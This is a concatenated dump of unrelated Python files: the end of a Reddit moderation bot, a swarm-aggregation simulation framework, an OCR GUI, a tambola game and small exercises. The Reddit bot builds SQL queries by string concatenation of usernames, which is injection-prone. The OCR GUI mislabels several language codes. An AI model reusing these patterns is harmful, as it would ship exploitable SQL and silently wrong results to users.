reply_text is not \"\":\n comment = submission.reply(reply_text+\"\\n\\n*****\\n\\n\"+footer)\n else:\n comment = submission.reply(footer)\n comment.mod.distinguish(sticky=True)\n logging.info(\"Replied to: \" + submission.title + \" Reason: \" + reply_reason)\n logID(submission.id)\n return\n\n\n\n#submission = reddit.submission(\"l2na5l\")\n#respond( submission )\n\n\n\n\nwhile True:\n try:\n logging.info(\"Initializing bot...\")\n for submission in subreddit.stream.submissions():\n if submission.created < int(time.time()) - 86400:\n continue\n if submission.title[0:1].lower() == \"[\" or submission.title[0:1].lower() == 
\"[\":\n\n\n if submission.id in open(apppath+'postids.txt').read():\n continue\n #logging.info(\"Week: \"+time.strftime('%Y%W'))\n #logging.info(\"Day: \"+time.strftime('%Y%m%d'))\n #logging.info(\"User: \"+submission.author.name)\n\n donotprocess=False\n\n ### handle weeklong deals\n if re.search(\"steampowered.com.*?filter=weeklongdeals\", submission.url) is not None:\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n today = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n monday = today - datetime.timedelta(days=today.weekday())\n datetext = monday.strftime('%Y%m%d')\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM weeklongdeals WHERE week = ' + datetext )\n rows = cursorObj.fetchall()\n if len(rows) == 0:\n today = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0)\n monday = today - datetime.timedelta(days=today.weekday())\n cursorObj.execute('INSERT INTO weeklongdeals (week, post) VALUES (?, ?)', (monday.strftime('%Y%m%d'), submission.id))\n con.commit()\n\n\n ###\n\n### Weekly Post Limit\n if Config.WeeklyPostLimit > 0:\n currentweek = time.strftime('%Y%W')\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM weeklyposts WHERE username = \"'+submission.author.name+'\" AND currentweek = '+currentweek)\n rows = cursorObj.fetchall()\n if len(rows) is 0:\n cursorObj.execute('INSERT INTO weeklyposts(username, postcount, currentweek) VALUES(\"'+submission.author.name+'\",1,'+currentweek+')')\n con.commit()\n else:\n curcount = rows[0][2]\n if int(curcount) > int(Config.WeeklyPostLimit):\n donotprocess=True\n logging.info(submission.author.name+' is over their weekly post limit')\n submission.mod.remove()\n comment = submission.reply(\"Thank you for your submission, but you have reached your weekly post limit\\n\\n^^^^^\\n\\nYou may contact the modderators if you feel you are being picked on\")\n comment.mod.distinguish(sticky=True)\n else:\n curcount=curcount+1\n cursorObj.execute(\"UPDATE weeklyposts SET postcount = \" + str(curcount) + ' WHERE id = ' + str(rows[0][0]))\n con.commit()\n con.close()\n###\n\n\n### Daily Post Limit\n if Config.DailyPostLimit > 0:\n currentday = time.strftime('%Y%m%d')\n con = sqlite3.connect(apppath+'gamedealsbot.db', timeout=20)\n cursorObj = con.cursor()\n cursorObj.execute('SELECT * FROM dailyposts WHERE username = \"'+submission.author.name+'\" AND currentday = '+currentday)\n rows = cursorObj.fetchall()\n if len(rows) is 0:\n cursorObj.execute('INSERT INTO dailyposts(username, postcount, currentday) VALUES(\"'+submission.author.name+'\",1,'+currentday+')')\n con.commit()\n else:\n curcount = rows[0][2]\n if int(curcount) > int(Config.DailyPostLimit):\n donotprocess=True\n logging.info(submission.author.name+' is over their daily post limit')\n submission.mod.remove()\n comment = submission.reply(\"Thank you for your submission, but you have reached your daily post limit\\n\\n^^^^^\\n\\nYou may contact the modderators if you feel you are being picked on\")\n comment.mod.distinguish(sticky=True)\n else:\n curcount=curcount+1\n cursorObj.execute(\"UPDATE dailyposts SET postcount = \" + str(curcount) + ' WHERE id = ' + str(rows[0][0]))\n con.commit()\n con.close\n###\n\n\n\n\n for top_level_comment in submission.comments:\n try:\n if top_level_comment.author and top_level_comment.author.name == Config.user:\n logID(submission.id)\n break\n except AttributeError:\n pass\n else: # no break before, so no 
comment from GDB\n if not donotprocess:\n respond(submission)\n continue\n\n\n except (prawcore.exceptions.RequestException, prawcore.exceptions.ResponseException):\n logging.info(\"Error connecting to reddit servers. Retrying in 1 minute...\")\n time.sleep(60)\n\n except praw.exceptions.APIException:\n logging.info(\"Rate limited, waiting 5 seconds\")\n time.sleep(5)\n","sub_path":"reddit_response.py","file_name":"reddit_response.py","file_ext":"py","file_size_in_byte":23457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"269475463","text":"import pandas as pd\nfrom FileLoader import FileLoader as loader\n\ndef ProportionBySport(df, year, sport, gender):\n\tdata = df.loc[lambda data: data[\"Year\"] == int(year)]\n\tdata = data.loc[lambda data: data[\"Sex\"] == gender]\n\tdata = data.drop_duplicates(subset=\"Name\")\n\tresult = data.shape[0]\t\n\tdata = data.loc[lambda data: data[\"Sport\"] == sport]\n\tresult = data.shape[0] / result\n\treturn result\n\ndef main():\n\t\"\"\" Main program \"\"\"\n\tdata = loader.load(\"../ex00/athlete_events.csv\")\n\tprint(ProportionBySport(data, 2004,\"Tennis\", 'F'))\n\treturn 0\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bootcamp_python/Day04/ex02/ProportionBySport.py","file_name":"ProportionBySport.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"347566585","text":"# Project: SwarmAggregation\n# Filename: exp.py\n# Authors: Joshua J. Daymude (jdaymude@asu.edu) and Noble C. Harasha\n# (nharasha@mit.edu).\n\n\"\"\"\nexp: A flexible, unifying framework for defining and running experiments for\n swarm aggregation.\n\"\"\"\n\nimport argparse\nfrom aggregation import aggregation, ideal\nfrom itertools import product\nfrom math import sin, cos, hypot, ceil\nfrom matplotlib.animation import FFMpegWriter, ArtistAnimation\nimport matplotlib.cm as cm\nfrom matplotlib.collections import LineCollection, PatchCollection, PolyCollection\nimport matplotlib.pyplot as plt\nfrom metrics import *\nimport numpy as np\nimport pickle\nfrom tqdm import tqdm\n\n\nclass Experiment(object):\n \"\"\"\n A flexible, unifying framework for experiments.\n \"\"\"\n\n def __init__(self, id, params={}, iters=1, savehist=True, seed=None):\n \"\"\"\n Inputs:\n - id (str): identifier for the experiment\n - params (dict): the full parameter set for the simulation runs\n {\n 'N' : [int > 0] number of robots,\n 'R' : [float > 0] radius of rotation (m),\n 'r' : [float > 0] radius of a robot (m),\n 'm' : [float > 0] mass of a robot (kg),\n 'w0' : [float] rot. speed of a robot about its center (rad/s),\n 'w1' : [float] rot. 
speed of a robot in place (rad/s),\n 'sensor' : [0 <= float <= pi] size of the sight sensor (rad),\n 'noise' : [(str, float)] either ('err', p) for error probability\n with probability p or ('mot', f) for motion noise with\n maximum force f (N),\n 'time' : [float > 0] wall-clock duration of simulation (s),\n 'step' : [float > 0] wall-clock duration of a time step (s),\n 'stop' : [float >= 0] if not None, simulation stops if system's\n dispersion is within stop% of the ideal value,\n 'init' : ['rand', 'symm'] initialization mode\n }\n - iters (int): the number of iterated runs for each parameter setting\n - savehist (bool): True if a run's history should be saved\n - seed (int): random seed\n \"\"\"\n # Unpack singular parameters.\n self.id, self.iters, self.savehist, self.seed, = id, iters, savehist, seed\n\n # Unpack aggregation parameters.\n defaults = {'N' : [100], 'R' : [0.1445], 'r' : [0.037], 'm' : [0.125], \\\n 'w0' : [-0.75], 'w1' : [-5.02], 'sensor' : [0], \\\n 'noise' : [('err', 0)], 'time' : [300], 'step' : [0.005], \\\n 'stop' : [None], 'init' : ['rand']}\n plist = [params[p] if p in params else defaults[p] for p in defaults]\n self.params = list(product(*plist))\n\n # Set up data and results filenames.\n self.fname = 'exp_{}_{}'.format(self.id, self.seed)\n\n # Instantiate a list to hold runs data. This data will have shape\n # A x B x [S x N x 3, 1] where A is the number of runs (i.e., unique\n # parameter combinations), B is the number of iterations per run, S is\n # the number of time steps simulated, N is the number of robots, and 3\n # represents each robot's X/Y/Theta data.\n self.runs_data = [[] for p in self.params]\n\n\n def run(self):\n \"\"\"\n Run this experiment according to the input parameters.\n \"\"\"\n tqdm.write('Running Experiment ' + self.id + '...')\n\n # Set up random seeds for iterated runs.\n rng = np.random.default_rng(self.seed)\n run_seeds = rng.integers(0, 2**32, size=self.iters)\n\n # For each parameter combination, do iterated runs of aggregation.\n silent = len(self.params) > 1 or self.iters > 1\n for i, param in enumerate(tqdm(self.params, desc='Simulating runs')):\n N, R, r, m, w0, w1, sensor, noise, time, step, stop, init = param\n for seed in tqdm(run_seeds, desc='Iterating run', \\\n leave=bool(i == len(self.params) - 1)):\n run_data = aggregation(N, R, r, m, w0, w1, sensor, noise, time,\\\n step, stop, init, seed, silent)\n if not self.savehist:\n # Only save the final configuration.\n history, final = run_data\n self.runs_data[i].append((np.copy(history[final-1]), final))\n else:\n # Save the entire configuration history.\n self.runs_data[i].append(run_data)\n\n\n def save(self):\n \"\"\"\n Saves this experiment, including all parameters and run data, to a file\n named according to the experiment's ID and seed.\n \"\"\"\n tqdm.write('Saving Experiment ' + self.id + '...')\n with open('data/' + self.fname + '.pkl', 'wb') as f:\n pickle.dump(self, f)\n\n\n def plot_evo(self, runs, iters, metrics=['sed', 'hull', 'disp', 'clus'], \\\n labels=None, title='', anno=''):\n \"\"\"\n Takes indices of either (i) one run and multiple iterations or (ii) one\n iteration of multiple runs and plots the given metrics against time.\n \"\"\"\n tqdm.write('Plotting metrics over time...')\n\n # Sanity checks and setup. 
Assumes N, r, time, and step are static.\n assert self.savehist, 'ERROR: No history to calculate metrics per step'\n assert len(runs) == 1 or len(iters) == 1, 'ERROR: One run or one iter'\n runits = [i for i in product(runs, iters)]\n\n # Set up colors.\n cmap = np.vectorize(lambda x : cm.inferno(x))\n c = np.array(cmap(np.linspace(0, 1, len(runits) + 2))).T\n\n # Plot metrics over time for each run/iteration.\n names = {'sed' : 'Smallest Enclosing Disc Circumference', \\\n 'hull' : 'Convex Hull Perimeter', \\\n 'disp' : 'Dispersion', \\\n 'clus' : 'Cluster Fraction'}\n for metric in metrics:\n fig, ax = plt.subplots()\n for i, runit in enumerate(tqdm(runits)):\n # Plot the given metric over time.\n N, r, time, step = [self.params[runit[0]][j] for j in [0,2,8,9]]\n configs, final = self.runs_data[runit[0]][runit[1]]\n x = np.arange(0, time + step, step)[:final]\n y = []\n for config in tqdm(configs, desc='Calculating '+names[metric]):\n if metric == 'sed':\n y.append(sed_circumference(config))\n elif metric == 'hull':\n y.append(hull_perimeter(config))\n elif metric == 'disp':\n y.append(dispersion(config))\n else: # metric == 'clus'\n y.append(cluster_fraction(config, r))\n if labels != None:\n ax.plot(x, y, color=c[i+1], label=labels[i], zorder=4)\n else:\n ax.plot(x, y, color=c[i+1], zorder=4)\n\n # Plot the minimum value for this metric as a dashed line.\n if metric == 'sed':\n metric_min = sed_circumference(ideal(N, r))\n elif metric == 'hull':\n metric_min = hull_perimeter(ideal(N, r))\n elif metric == 'disp':\n metric_min = dispersion(ideal(N, r))\n else: # metric == 'clus'\n metric_min = cluster_fraction(ideal(N, r), r)\n ax.plot(x, np.full(len(x), metric_min), color=c[i+1], \\\n linestyle='dashed', zorder=3)\n\n # Save figure.\n ax.set(title=title, xlabel='Time (s)', ylabel=names[metric])\n ax.set_ylim(bottom=0)\n ax.grid()\n if labels != None:\n ax.legend(loc='upper right')\n plt.tight_layout()\n fig.savefig('figs/' + self.fname + '_' + metric + anno + '.png', \\\n dpi=300)\n plt.close()\n\n\n def plot_aggtime(self, N, ps, plabel, title='', anno=''):\n \"\"\"\n Plots final and average time to aggregation per parameter value per\n number of robots. 
Assumes that the only parameters that are varied are\n the number of robots (N) and one non-time related parameter.\n \"\"\"\n tqdm.write('Plotting average time to aggregation...')\n\n # Set up figure and colors.\n fig, ax = plt.subplots()\n cmap = np.vectorize(lambda x : cm.inferno(x))\n c = np.array(cmap(np.linspace(0, 1, len(N) + 2))).T\n\n # Plot simulation time cutoff as a dashed line.\n time, step = self.params[0][8], self.params[0][9]\n ax.plot(ps, np.full(len(ps), time), color='k', linestyle='dashed')\n\n # Plot iteration times as a scatter plot and averages as lines.\n for i, ni in enumerate(N):\n xs, ys, aves = [], [], []\n for j, run in enumerate(self.runs_data[i*len(ps):(i+1)*len(ps)]):\n agg_times = []\n for iter in run:\n xs.append(ps[j])\n agg_times.append(iter[1] * step)\n ys += agg_times\n aves.append(np.mean(agg_times))\n ax.scatter(xs, ys, color=c[i+1], s=15, alpha=0.4)\n ax.plot(ps, aves, color=c[i+1], label='{} robots'.format(ni))\n\n # Save figure.\n ax.set(title=title, xlabel=plabel, ylabel='Aggregation Time (s)')\n ax.set_ylim(bottom=0)\n ax.grid()\n ax.legend(loc='upper left')\n plt.tight_layout()\n fig.savefig('figs/' + self.fname + '_aggtime' + anno + '.png', dpi=300)\n plt.close()\n\n\n def animate(self, run, iter, frame=25, anno=''):\n \"\"\"\n Animate the robots' movement over time.\n \"\"\"\n tqdm.write('Animating robots\\' movement...')\n\n # Check that a configuration history exists.\n assert self.savehist, 'ERROR: No history to animate'\n\n # Check that the desired frame rate is valid.\n assert frame > 0, 'ERROR: Frame rate must be positive value'\n\n # Get data and parameters.\n configs, final = self.runs_data[run][iter]\n N, r, sensor, time, step = [self.params[run][i] for i in [0,2,6,8,9]]\n\n # Set up plot.\n fig, ax = plt.subplots(figsize=(5,5), dpi=300)\n all_xy = configs[:,:,:2].flatten()\n fig_min, fig_max = np.min(all_xy) - r, np.max(all_xy) + r\n ax.set(xlim=[fig_min, fig_max], ylim=[fig_min, fig_max])\n\n # Set up colors for the various robots.\n cmap = np.vectorize(lambda x : cm.inferno(x))\n c = np.array(cmap(np.linspace(0, 0.9, N))).T\n\n # Set up frame rate to target at most 'frame' fps in real time.\n frame_step = 1 if step >= 1 / frame else ceil(1 / frame / step)\n interval = (step * frame_step) * 1000 # ms\n\n ims = []\n max_dist = hypot(*np.full(2, fig_max-fig_min))\n for s in tqdm(np.arange(0, min(len(configs), final), frame_step)):\n title = plt.text(1.0, 1.02, '{:.2f}s of {}s'.format(s*step, time), \\\n ha='right', va='bottom', transform=ax.transAxes)\n robots, lines, cones = [], [], []\n for i in range(N):\n xy, theta = configs[s][i][:2], configs[s][i][2]\n sensor_xy = xy + np.array([r * cos(theta), r * sin(theta)])\n\n # Add this robot's circle artist.\n robots.append(plt.Circle(xy, radius=r, linewidth=0, color=c[i]))\n\n # Add this robot's sight sensor direction artist.\n vec = max_dist * np.array([cos(theta), sin(theta)])\n lines.append([sensor_xy, sensor_xy + vec])\n\n # Add this robot's cone-of-sight polygon artist.\n if sensor > 0:\n cw, ccw = theta - sensor / 2, theta + sensor / 2\n vec_cw = max_dist * np.array([cos(cw), sin(cw)])\n vec_ccw = max_dist * np.array([cos(ccw), sin(ccw)])\n tri_pts = [sensor_xy, sensor_xy+vec_cw, sensor_xy+vec_ccw]\n cones.append(plt.Polygon(tri_pts, color=c[i], alpha=0.15))\n\n # Add this step's artists to the list of artists.\n robots = PatchCollection(robots, match_original=True, zorder=3)\n lines = LineCollection(lines, linewidths=0.5, colors=c, alpha=0.75,\\\n zorder=2)\n cones = 
PatchCollection(cones, match_original=True, zorder=1)\n ims.append([title, ax.add_collection(robots), \\\n ax.add_collection(lines), ax.add_collection(cones)])\n\n # Animate.\n ani = ArtistAnimation(fig, ims, interval=interval, blit=True)\n ani.save('anis/' + self.fname + '_ani' + anno + '.mp4')\n plt.close()\n\n\ndef load_exp(fname):\n \"\"\"\n Load an experiment from the specified file.\n \"\"\"\n with open(fname, 'rb') as f:\n exp = pickle.load(f)\n\n return exp\n\n\n### DATA EXPERIMENTS ###\n\ndef exp_base(seed=None):\n \"\"\"\n With default parameters, investigate aggregation over time.\n \"\"\"\n params = {} # This uses all default values.\n exp = Experiment('base', params, seed=seed)\n exp.run()\n exp.save()\n exp.plot_evo(runs=[0], iters=[0])\n exp.animate(run=0, iter=0)\n\n\ndef exp_symm(seed=None):\n \"\"\"\n With default parameters and symmetric initialization, investigate\n aggregation over time for a few system sizes.\n \"\"\"\n N = [3, 5, 10]\n params = {'N' : N, 'init' : ['symm']}\n exp = Experiment('symm', params, seed=seed)\n exp.run()\n exp.save()\n exp.plot_evo(runs=np.arange(len(exp.params)), iters=[0], metrics=['disp'], \\\n labels=['{} robots'.format(i) for i in N], \\\n title='Symmetric Initial Configuration')\n\n\ndef exp_errprob(seed=None):\n \"\"\"\n With default parameters and a range of error probabilities, investigate\n average time to aggregation with a 15% stopping condition.\n \"\"\"\n N = [10, 25, 50, 100]\n errprob = np.arange(0, 0.501, 0.0125)\n params = {'N' : N, 'noise' : [('err', p) for p in errprob], 'stop' : [0.15]}\n exp = Experiment('errprob', params, iters=25, savehist=False, seed=seed)\n exp.run()\n exp.save()\n exp.plot_aggtime(N, errprob, 'Error Probability')\n\n\ndef exp_motion(seed=None):\n \"\"\"\n With default parameters and a range of motion noise strengths, investigate\n average time to aggregation with a 15% stopping condition.\n \"\"\"\n N = [10, 25, 50, 100]\n fmax = np.arange(0, 40.1, 1.25)\n params = {'N' : N, 'noise' : [('mot', f) for f in fmax], 'stop' : [0.15]}\n exp = Experiment('motion', params, iters=25, savehist=False, seed=seed)\n exp.run()\n exp.save()\n exp.plot_aggtime(N, fmax, 'Max. 
Noise Force (N)')\n\n\ndef exp_cone(seed=None):\n \"\"\"\n With default parameters and a range of sight sensor sizes, investigate\n average time to aggregation with a 15% stopping condition.\n \"\"\"\n N = [10, 25, 50, 100]\n sensor = np.arange(0, np.pi, 0.1)\n params = {'N' : N, 'sensor' : sensor, 'stop' : [0.15]}\n exp = Experiment('cone', params, iters=25, savehist=False, seed=seed)\n exp.run()\n exp.save()\n exp.plot_aggtime(N, sensor, 'Sight Sensor Size (rad)')\n\n\n### CALIBRATION EXPERIMENTS ###\n\ndef exp_step(seed=None):\n \"\"\"\n With default parameters and a range of time step durations, investigate\n aggregation over time.\n \"\"\"\n step = [0.0005, 0.001, 0.005, 0.01, 0.025]\n params = {'N' : [50], 'time' : [120], 'step' : step}\n exp = Experiment('step', params, seed=seed)\n exp.run()\n exp.save()\n exp.plot_evo(runs=np.arange(len(exp.params)), iters=[0], metrics=['disp'], \\\n labels=['{}s'.format(i) for i in step])\n\n\nif __name__ == '__main__':\n # Parse command line arguments.\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-E', '--exps', type=str, nargs='+', required=True, \\\n help='IDs of experiments to run')\n parser.add_argument('-R', '--rand_seed', type=int, default=None, \\\n help='Seed for random number generation')\n args = parser.parse_args()\n\n # Run selected experiments.\n exps = {'base' : exp_base, 'symm' : exp_symm, 'errprob' : exp_errprob, \\\n 'motion' : exp_motion, 'cone' : exp_cone, 'step' : exp_step}\n for id in args.exps:\n exps[id](args.rand_seed)\n","sub_path":"exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":16462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493293090","text":"\n\nfrom xai.brain.wordbase.nouns._reflex import _REFLEX\n\n#calss header\nclass _REFLEXES(_REFLEX, ):\n\tdef __init__(self,): \n\t\t_REFLEX.__init__(self)\n\t\tself.name = \"REFLEXES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"reflex\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_reflexes.py","file_name":"_reflexes.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"366910357","text":"import random\r\nimport time\r\ndef game():\r\n t1 = [1, 11, 21, 31, 41, 51, 61, 71, 81]\r\n t2 = [2, 12, 22, 32, 42, 52, 62, 72, 82]\r\n t3 = [3, 13, 23, 33, 43, 53, 63, 73, 83]\r\n t4 = [4, 14, 24, 34, 44, 54, 64, 74, 84]\r\n t5 = [5, 15, 25, 35, 45, 55, 65, 75, 85]\r\n t6 = [6, 16, 26, 36, 46, 56, 66, 76, 86]\r\n t7 = [7, 17, 27, 37, 47, 57, 67, 77, 87]\r\n t8 = [8, 18, 28, 38, 48, 58, 68, 78, 88]\r\n t9 = [9, 19, 29, 39, 49, 59, 69, 79, 89]\r\n tables = [t1, t2, t3, t4, t5, t6, t7, t8, t9]\r\n\r\n players = int(input(\"\\nEnter the no of players(min 2 players):\"))\r\n n = 0\r\n if(players == 1):\r\n print(\"Sorry !!! 
1 player can't play this game\\n\")\r\n game()\r\n else:\r\n while n < players and players < 11:\r\n random.shuffle(t1)\r\n random.shuffle(t2)\r\n random.shuffle(t3)\r\n random.shuffle(t4)\r\n random.shuffle(t5)\r\n random.shuffle(t6)\r\n random.shuffle(t7)\r\n random.shuffle(t8)\r\n random.shuffle(t9)\r\n random.shuffle(tables)\r\n print(\"User\",n+1,\":\", tables[n])\r\n n = n+1\r\n print()\r\n\r\n \r\n print(\"Plz note down the tables\")\r\n ch = str(input(\"\\nShall we start the game:(Y|N)\"))\r\n\r\n if( ch == 'Y' or ch == 'y'):\r\n i = 1\r\n j = 1\r\n while(j < players+1):\r\n while(i < 10 * players+1):\r\n print(\"User:\")\r\n j = j + 1\r\n print(random.randint(1,91),\"\\n\")\r\n time.sleep(1)\r\n i = i + 1\r\n print()\r\n \r\n j = j+1\r\n winner = str(input(\"Enter the winner:\"))\r\n print(\"*****Congrats\",winner,\"****\")\r\n else:\r\n print(\"Ok Bye\")\r\n \r\ngame()\r\n\r\nch = str(input(\"Do u want to play again(Y|N):\"))\r\nif(ch == 'Y' or ch == 'y'):\r\n game()\r\nelse:\r\n print(\"thank you visit again\")\r\n\r\n\r\n\r\n\r\n#new\r\n\r\n \r\n \r\n","sub_path":"JARVIS/tambola.py","file_name":"tambola.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"215819666","text":"import os\r\nfrom subprocess import call\r\nimport subprocess\r\nimport sys\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog, Text,messagebox\r\nimport time\r\nfrom PIL import Image\r\nimport pytesseract\r\n\r\npytesseract.pytesseract.tesseract_cmd = r'Tesseract-OCR\\tesseract.exe'\r\n\r\nclass ConversionGui:\r\n def __init__(self):\r\n def click_Main():\r\n Gui1.destroy() \r\n call([ r\"Main.exe\"]) \r\n def click_capture(): \r\n call([\"python\", \"webcam.py\"]) \r\n def center_window(w=300, h=200):\r\n # get screen width and height\r\n ws = Gui1.winfo_screenwidth()\r\n hs = Gui1.winfo_screenheight()\r\n # calculate position x, y\r\n x = (ws/2) - (w/2) \r\n y = (hs/2) - (h/2)\r\n Gui1.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n\r\n def get_file():\r\n filename=filedialog.askopenfilename(initialdir=\"/Retry number2/\",title=\"Select File\",\r\n filetypes=((\"jpeg files\",\"*.jpg\"),(\"PNG Files\", \"*.png\"),(\"all files\", \"*.*\")))\r\n language=self.comboExample.get()\r\n \r\n if language == 'Afrikaans':\r\n abbr='afr'\r\n if language == 'Amharic':\r\n abbr='amh'\r\n if language == 'Arabic':\r\n abbr='ara'\r\n if language == 'Assamese':\r\n abbr='asm'\r\n if language == 'Azerbaijani':\r\n abbr='aze'\r\n if language == 'Cyrilic':\r\n abbr='aze_cyrl'\r\n if language == 'Belarusian':\r\n abbr='bel'\r\n if language == 'Bengali':\r\n abbr='ben'\r\n if language == 'Tibetan':\r\n abbr='tib'\r\n if language == 'Bosnian':\r\n abbr='bos'\r\n if language == 'Breton':\r\n abbr='bre'\r\n if language == 'Catalan':\r\n abbr='cat'\r\n if language == 'Cebuano':\r\n abbr='ceb'\r\n if language == 'Czech':\r\n abbr='ces'\r\n if language == 'Chinese simplified':\r\n abbr='chi_sim'\r\n if language == 'Chinese traditional':\r\n abbr='chi_tra'\r\n if language == 'Cherokee':\r\n abbr='chr'\r\n if language == 'Welsh':\r\n abbr='cym '\r\n if language == 'Danish':\r\n abbr='dan'\r\n if language == 'German':\r\n abbr='deu'\r\n if language == 'Dzongkha':\r\n abbr='dzo'\r\n if language == 'Greek':\r\n abbr='ell'\r\n if language == 'English':\r\n abbr='eng'\r\n if language == 'Esperanto':\r\n abbr='epo'\r\n if language == 'Persian':\r\n abbr='fas'\r\n if language == 'Finnish':\r\n abbr='fas'\r\n if 
language == 'Hebrew':\r\n abbr='fin'\r\n if language == 'Japanese':\r\n abbr='jpn'\r\n if language == 'Kurdish':\r\n abbr='kur'\r\n if language == 'Russian':\r\n abbr='rus'\r\n if language == 'Serbian':\r\n abbr='srp'\r\n if language == 'Swedish':\r\n abbr='swe'\r\n if language == 'Tagalog':\r\n abbr='tgl'\r\n if language == 'French':\r\n abbr='fra'\r\n if language == 'Hindi':\r\n abbr='hin'\r\n if language == 'Bulgarian':\r\n abbr='bre'\r\n if language == 'Korean':\r\n abbr='kor'\r\n #ocrstring = pytesseract.image_to_string(Image.open(filename), lang= abbr)\r\n try:\r\n # print(\"Processing\")\r\n ocrstring = pytesseract.image_to_string(Image.open(filename), lang= abbr)\r\n '''\r\n try:\r\n temp = open(\"temp.txt\", \"w\")\r\n temp.write(ocrstring)\r\n temp.close()\r\n except:'''\r\n temp = open(\"temp.txt\",\"w\", encoding='utf-8')\r\n temp.write(ocrstring)\r\n temp.close()\r\n Gui1.destroy()\r\n call([\"python\", \"Process.py\"])\r\n except:\r\n \r\n messagebox.showinfo(\"Warning!\", \"Processing Failed (Wrong file/datatype)\")\r\n\r\n Gui1 = Tk()\r\n helv = \"Helvetica\", 18,\"bold\"\r\n titlefont = \"Helvetica\", 22,\"bold\"\r\n center_window(400, 600) \r\n Gui1.title(\"Optical Character Recognition\")\r\n Gui1.configure(background=\"#121212\")\r\n Gui1.configure(highlightbackground=\"#d9d9d9\")\r\n Gui1.configure(highlightcolor=\"black\", borderwidth= 10, relief=RIDGE)\r\n Gui1.resizable(FALSE,FALSE)\r\n #Gui1.overrideredirect(TRUE)\r\n\r\n self.Frame1 = Frame(Gui1)\r\n self.Frame1.place(relx=0.02, rely=0.03, relheight=0.94, relwidth=0.96)\r\n self.Frame1.configure(relief=RIDGE,borderwidth=\"2\",background=\"#3d3d3d\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n\r\n \r\n\r\n self.title = Label(self.Frame1)\r\n self.title.place(relx=0.08, rely=0.03, height=103, width=300)\r\n self.title.configure(background=\"#3d3d3d\",foreground=\"white\", text=\"Pick your choices\", font=titlefont)\r\n\r\n self.comboExample = ttk.Combobox(self.Frame1, values=[\r\n \"Afrikaans\", \"Amharic\",\"Arabic\",\"Assamese\",\"Azerbaijani\",\"Cyrilic\",\"Belarusian\",\"Bengali\",\"Tibetan\",\"Bosnian\",\"Breton\",\r\n \"Bulgarian\",\"Catalan\",\"Cebuano\",\"Czech\",\"Chinese simplified\",\"Chinese traditional\",\"Cherokee\",\"Welsh\",\"Danish\",\"German\",\r\n \"Dzongkha\",\"Greek\",\"English\",\"Esperanto\",\"Persian\",\"Finnish\",\"French\",\"Hebrew\",\"Hindi\",\"Japanese\",\"Kurdish Kurmanji\",\"Korean\",\r\n \"Russian\",\"Serbian\",\"Swedish\",\"Tagalog\"\r\n ]) \r\n self.comboExample.place(relx=0.30, rely=0.18, height=30, width=150)\r\n self.comboExample.set('English')\r\n\r\n #print(self.comboExample.get())\r\n self.Button1 = Button(self.Frame1)\r\n self.Button1.place(relx=0.12, rely=0.26, height=103, width=266)\r\n self.Button1.configure(relief=RIDGE,activebackground=\"#d9d9d9\",font=helv,background=\"#121212\",foreground=\"#ffffff\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n self.Button1.configure(text='''Select Image''')\r\n self.Button1.configure(command = get_file)\r\n\r\n self.Button2 = Button(self.Frame1)\r\n self.Button2.place(relx=0.12, rely=0.47, height=103, width=266)\r\n self.Button2.configure(relief=RIDGE,activebackground=\"#d9d9d9\",font=helv,background=\"#121212\",foreground=\"#ffffff\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n self.Button2.configure(text='''Capture''')\r\n self.Button2.configure(command = click_capture)\r\n\r\n self.Button3 = Button(self.Frame1)\r\n self.Button3.place(relx=0.12, rely=0.68, height=103, width=266)\r\n 
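# Button3 (\"Back\") repeats the RIDGE/dark styling applied to Button1 and Button2 above.\r\n        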
self.Button3.configure(relief=RIDGE,activebackground=\"#d9d9d9\",font=helv,background=\"#121212\",foreground=\"#ffffff\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n        self.Button3.configure(command = click_Main)\r\n        self.Button3.configure(text='''Back''')\r\n\r\n        Gui1.mainloop()\r\nif __name__ == '__main__':\r\n    Gui=ConversionGui()","sub_path":"Conversion.py","file_name":"Conversion.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"9340861","text":"#!/bin/python\n\nimport time\n\ncommands = {'test':'This is a test', 'check':'This is a check'}\n\nwhile True:\n    gmtime = time.gmtime()\n    prompt = str(gmtime.tm_year) + str(gmtime.tm_mon) + str(gmtime.tm_mday)\n    inp = input(prompt+'>')\n\n    if inp == 'exit':\n        exit(0)\n    else:\n        if inp.strip() in commands.keys():\n            print(commands[inp.strip()])\n        else:\n            print('Command not found')\n","sub_path":"simulateTerminal.py","file_name":"simulateTerminal.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
